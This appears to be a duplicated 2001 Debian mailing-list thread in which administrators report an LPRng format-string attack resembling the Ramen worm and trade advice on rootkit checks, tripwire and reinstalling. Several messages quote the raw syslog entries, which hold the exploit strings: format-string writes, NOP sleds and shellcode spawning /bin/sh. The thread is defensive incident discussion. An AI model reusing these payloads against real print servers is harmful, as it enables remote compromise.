Re: Got hacked by Ramen-style attack
Thomas Amm <[EMAIL PROTECTED]> wrote: |> that's what I found in my logs after I had to reboot my |> Router, which also worked as print server (Now I know better) |> because of a DoS. Exactly the same messages here (in /var/log/sys.log and /var/log/messages). See my earlier posting: To: debian-user@lists.debian.org Subject: LPRNG vulnerability [was Re: weird messages in syslog] From: Jim McCloskey <[EMAIL PROTECTED]> Date: Wed, 21 Nov 2001 10:29:16 -0800 CC: debian-security@lists.debian.org References: <[EMAIL PROTECTED]> I am using lprng 3.8.0 from Debian testing. I am not running nmbd. There are no messages in the logs about accepted or refused connections that seem to be related to the incident. |> So there are some questions, I would like to pose : |> Is Woody's lprng still vulnerable ? I've got the latest version. I think it must be. |> Is the shown exploit a sign that someone already was in there, or just for |> an |> attempt |> ? |> Can I find possible backdoors, or will I have to re-install ? I also would love answers to these questions. I've not managed to find any signs of damage so far, and the incident didn't bring the system down, but I'm very nervous ... Jim PS here are the relevant messages: -- Nov 20 01:18:12 localhost SERVER[21311]: Dispatch_input: bad request line 'BB??\ ??XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\2\ 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ . 2201?1?1??F?\200\211?1??f\211?1?\211?C\211]?C\211]?K\211M?\215M??\2001?\211 Nov 20 01:18:13 localhost SERVER[21312]: Dispatch_input: bad request line 'BB(???)???*?\ ??+???XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n\220\220\22\ 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2\ 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ repeated then at one second intervals between 01:18:12 and 01:18:47---the same message followed by the same long sequence of garbage-characters, with a new PID each time. --
Re: Got hacked by Ramen-style attack
Thomas Amm <[EMAIL PROTECTED]> wrote: |> that's what I found in my logs after I had to reboot my |> Router, which also worked as print server (Now I know better) |> because of a DoS. Exactly the same messages here (in /var/log/sys.log and /var/log/messages). See my earlier posting: To: [EMAIL PROTECTED] Subject: LPRNG vulnerability [was Re: weird messages in syslog] From: Jim McCloskey <[EMAIL PROTECTED]> Date: Wed, 21 Nov 2001 10:29:16 -0800 CC: [EMAIL PROTECTED] References: I am using lprng 3.8.0 from Debian testing. I am not running nmbd. There are no messages in the logs about accepted or refused connections that seem to be related to the incident. |> So there are some questions, I would like to pose : |> Is Woody's lprng still vulnerable ? I've got the latest version. I think it must be. |> Is the shown exploit a sign that someone already was in there, or just for |> an |> attempt |> ? |> Can I find possible backdoors, or will I have to re-install ? I also would love answers to these questions. I've not managed to find any signs of damage so far, and the incident didn't bring the system down, but I'm very nervous ... Jim PS here are the relevant messages: -- Nov 20 01:18:12 localhost SERVER[21311]: Dispatch_input: bad request line 'BB??\ ??XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\2\ 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ . 2201?1?1??F?\200\211?1??f\211?1?\211?C\211]?C\211]?K\211M?\215M??\2001?\211 Nov 20 01:18:13 localhost SERVER[21312]: Dispatch_input: bad request line 'BB(???)???*?\ ??+???XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n\220\220\22\ 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2\ 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ repeated then at one second intervals between 01:18:12 and 01:18:47---the same message followed by the same long sequence of garbage-characters, with a new PID each time. -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Got hacked by Ramen-style attack
hi ya giacomo.. On Thu, 22 Nov 2001, Giacomo Mulas wrote: > On Thu, 22 Nov 2001, Alvin Oga wrote: > > > they tried doesn't mean they got in > > you are correct so far, but if you read later on, the original poster > adds: > > > I had a number of rejected packets to port 137 immediately before, nmbd > > crashed and the lprng exploit started. > > If at least one daemon was crashed, the attack may have been successful, > so he has every reason to be cautious. yup but, i'd move the samba server to be internal.. and not externally visible - no reason for samba servers to be externally visible samba ( nmbd/smbd could die for many different reasons ) without knowing the state of the fs before the attack... its a little harder to find what's different... - ie.. run tripwire, checksums, aide, etc - when checking a possibly infected host, am assuming one uses the binary off of a cdrom instead of the (trojaned) machine itself to check its binary... which usually returns all okay..even if its not fun stuff... to go checking ... not fun to have to rebuild a new box and very carefully restore data have fun linux alvin
Re: Got hacked by Ramen-style attack
On Thu, 22 Nov 2001, Alvin Oga wrote: > they tried doesn't mean they got in you are correct so far, but if you read later on, the original poster adds: > I had a number of rejected packets to port 137 immediately before, nmbd > crashed and the lprng exploit started. If at least one daemon was crashed, the attack may have been successful, so he has every reason to be cautious. Bye Giacomo -- _ Giacomo Mulas <[EMAIL PROTECTED], [EMAIL PROTECTED]> _ OSSERVATORIO ASTRONOMICO DI CAGLIARI Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA) Tel.: +39 070 71180 216 Fax : +39 070 71180 222 _ "When the storms are raging around you, stay right where you are" (Freddy Mercury) _
Re: Got hacked by Ramen-style attack
hi ya > > Nov 21 03:29:36 lan1 -- MARK -- > > Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line > > > 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%. > 192u they tried doesn't mean they got in > > I searched the system for fragments of the Ramen worm after reboot but I > > found nothing suspicious. how did you check ??? http://www.ists.dartmouth.edu/IRIA/knowledge_base/tools/ramenfind.htm - lots of tools to check for stuff to check for other root kits they may have used/hidden/left behind... http://www.chkrootkit.org - many other tools ( search for rootkit, trojans, etc.. ) if you re-install without digging deeper...you wont learn anything new ?? if you do dig deeper..maybe you'd find lots of suspicious files??? re-install assumes oyu patch it up to current levels, and that your backup data does NOT have any trojans Debian Security howto http://www.debian.org/doc/manuals/securing-debian-howto/ c ya alvin http://www.Linux-Sec.net .. rest of the hardening howto .. > > The attack seemed to come over nmbd, although all ports, exept inetd are > > blocked to the > > outside > > vi ipchains. I had a number of rejected packets to port 137 immediately > > before, > > nmbd crashed > > and > > the lprng exploit started. > > So there are some questions, I would like to pose : > > Is Woody's lprng still vulnerable ? I've got the latest version. > > Is the shown exploit a sign that someone already was in there, or just for > > an > > attempt > > ? > > Can I find possible backdoors, or will I have to re-install ? > >
Re: Got hacked by Ramen-style attack
try to : nmap -I -O -P0 127.0.0.1 ps ax and see if you see something strange for more help from me just paste tables in an email note: once i had socklist ... a program that could tell u which programs keeps sockets up note2: look, no sock opens doesnt mean u re without any backdoor ... a sock can open on an event such as time-trigger or icmp trigger ... so u should monitor more that machine SaDIKuZboy - Original Message - From: "Thomas Amm" <[EMAIL PROTECTED]> To: Sent: Thursday, November 22, 2001 1:50 PM Subject: Got hacked by Ramen-style attack > > On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > > Hi all, > > that's what I found in my logs after I had to reboot my > Router, which also worked as print server (Now I know better) > because of a DoS. > > > Nov 21 03:29:36 lan1 -- MARK -- > Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line > 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%. 192u > %303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1É ²?ÐÍ > ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' > Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line > 'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$ n%.1 > 92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍ Ã1ɲ > ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' > Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH > (and so on) - the lpr.log shows the same entries. > > I searched the system for fragments of the Ramen worm after reboot but I > found > nothing > suspicious. > The attack seemed to come over nmbd, although all ports, exept inetd are > blocked to the > outside > vi ipchains. I had a number of rejected packets to port 137 immediately > before, > nmbd crashed > and > the lprng exploit started. > So there are some questions, I would like to pose : > Is Woody's lprng still vulnerable ? I've got the latest version. > Is the shown exploit a sign that someone already was in there, or just for > an > attempt > ? > Can I find possible backdoors, or will I have to re-install ? > > Thanks, > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.0.6 (GNU/Linux) > Comment: For info see http://www.gnupg.org > > iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je > ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t > =8csx > -END PGP SIGNATURE- > > -- > Things are more like they are today than they ever were before. > -- Dwight Eisenhower > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] >
Got hacked by Ramen-style attack
On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi all, that's what I found in my logs after I had to reboot my Router, which also worked as print server (Now I know better) because of a DoS. Nov 21 03:29:36 lan1 -- MARK -- Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u %303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1 92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH (and so on) - the lpr.log shows the same entries. I searched the system for fragments of the Ramen worm after reboot but I found nothing suspicious. The attack seemed to come over nmbd, although all ports, exept inetd are blocked to the outside vi ipchains. I had a number of rejected packets to port 137 immediately before, nmbd crashed and the lprng exploit started. So there are some questions, I would like to pose : Is Woody's lprng still vulnerable ? I've got the latest version. Is the shown exploit a sign that someone already was in there, or just for an attempt ? Can I find possible backdoors, or will I have to re-install ? Thanks, -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t =8csx -END PGP SIGNATURE- -- Things are more like they are today than they ever were before. -- Dwight Eisenhower
Re: Got hacked by Ramen-style attack
hi ya giacomo.. On Thu, 22 Nov 2001, Giacomo Mulas wrote: > On Thu, 22 Nov 2001, Alvin Oga wrote: > > > they tried doesn't mean they got in > > you are correct so far, but if you read later on, the original poster > adds: > > > I had a number of rejected packets to port 137 immediately before, nmbd > > crashed and the lprng exploit started. > > If at least one daemon was crashed, the attack may have been successful, > so he has every reason to be cautious. yup but, i'd move the samba server to be internal.. and not externally visible - no reason for samba servers to be externally visible samba ( nmbd/smbd could die for many different reasons ) without knowing the state of the fs before the attack... its a little harder to find what's different... - ie.. run tripwire, checksums, aide, etc - when checking a possibly infected host, am assuming one uses the binary off of a cdrom instead of the (trojaned) machine itself to check its binary... which usually returns all okay..even if its not fun stuff... to go checking ... not fun to have to rebuild a new box and very carefully restore data have fun linux alvin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Got hacked by Ramen-style attack
On Thu, 22 Nov 2001, Alvin Oga wrote: > they tried doesn't mean they got in you are correct so far, but if you read later on, the original poster adds: > I had a number of rejected packets to port 137 immediately before, nmbd > crashed and the lprng exploit started. If at least one daemon was crashed, the attack may have been successful, so he has every reason to be cautious. Bye Giacomo -- _ Giacomo Mulas <[EMAIL PROTECTED], [EMAIL PROTECTED]> _ OSSERVATORIO ASTRONOMICO DI CAGLIARI Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA) Tel.: +39 070 71180 216 Fax : +39 070 71180 222 _ "When the storms are raging around you, stay right where you are" (Freddy Mercury) _ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Got hacked by Ramen-style attack
hi ya > > Nov 21 03:29:36 lan1 -- MARK -- > > Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line > > > 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%. > 192u they tried doesn't mean they got in > > I searched the system for fragments of the Ramen worm after reboot but I > > found nothing suspicious. how did you check ??? http://www.ists.dartmouth.edu/IRIA/knowledge_base/tools/ramenfind.htm - lots of tools to check for stuff to check for other root kits they may have used/hidden/left behind... http://www.chkrootkit.org - many other tools ( search for rootkit, trojans, etc.. ) if you re-install without digging deeper...you wont learn anything new ?? if you do dig deeper..maybe you'd find lots of suspicious files??? re-install assumes oyu patch it up to current levels, and that your backup data does NOT have any trojans Debian Security howto http://www.debian.org/doc/manuals/securing-debian-howto/ c ya alvin http://www.Linux-Sec.net .. rest of the hardening howto .. > > The attack seemed to come over nmbd, although all ports, exept inetd are > > blocked to the > > outside > > vi ipchains. I had a number of rejected packets to port 137 immediately > > before, > > nmbd crashed > > and > > the lprng exploit started. > > So there are some questions, I would like to pose : > > Is Woody's lprng still vulnerable ? I've got the latest version. > > Is the shown exploit a sign that someone already was in there, or just for > > an > > attempt > > ? > > Can I find possible backdoors, or will I have to re-install ? > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Got hacked by Ramen-style attack
try to : nmap -I -O -P0 127.0.0.1 ps ax and see if you see something strange for more help from me just paste tables in an email note: once i had socklist ... a program that could tell u which programs keeps sockets up note2: look, no sock opens doesnt mean u re without any backdoor ... a sock can open on an event such as time-trigger or icmp trigger ... so u should monitor more that machine SaDIKuZboy - Original Message - From: "Thomas Amm" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Thursday, November 22, 2001 1:50 PM Subject: Got hacked by Ramen-style attack > > On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > > Hi all, > > that's what I found in my logs after I had to reboot my > Router, which also worked as print server (Now I know better) > because of a DoS. > > > Nov 21 03:29:36 lan1 -- MARK -- > Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line > 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%. 192u > %303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1É ²?ÐÍ > ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' > Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line > 'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$ n%.1 > 92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍ Ã1ɲ > ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' > Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH > (and so on) - the lpr.log shows the same entries. > > I searched the system for fragments of the Ramen worm after reboot but I > found > nothing > suspicious. > The attack seemed to come over nmbd, although all ports, exept inetd are > blocked to the > outside > vi ipchains. I had a number of rejected packets to port 137 immediately > before, > nmbd crashed > and > the lprng exploit started. > So there are some questions, I would like to pose : > Is Woody's lprng still vulnerable ? I've got the latest version. > Is the shown exploit a sign that someone already was in there, or just for > an > attempt > ? > Can I find possible backdoors, or will I have to re-install ? > > Thanks, > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.0.6 (GNU/Linux) > Comment: For info see http://www.gnupg.org > > iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je > ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t > =8csx > -END PGP SIGNATURE- > > -- > Things are more like they are today than they ever were before. > -- Dwight Eisenhower > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Got hacked by Ramen-style attack
On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi all, that's what I found in my logs after I had to reboot my Router, which also worked as print server (Now I know better) because of a DoS. Nov 21 03:29:36 lan1 -- MARK -- Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XX%.156u%300$n%.21u%301$nsecurity%302$n%.192u %303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1 92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH (and so on) - the lpr.log shows the same entries. I searched the system for fragments of the Ramen worm after reboot but I found nothing suspicious. The attack seemed to come over nmbd, although all ports, exept inetd are blocked to the outside vi ipchains. I had a number of rejected packets to port 137 immediately before, nmbd crashed and the lprng exploit started. So there are some questions, I would like to pose : Is Woody's lprng still vulnerable ? I've got the latest version. Is the shown exploit a sign that someone already was in there, or just for an attempt ? Can I find possible backdoors, or will I have to re-install ? Thanks, -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t =8csx -END PGP SIGNATURE- -- Things are more like they are today than they ever were before. -- Dwight Eisenhower -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
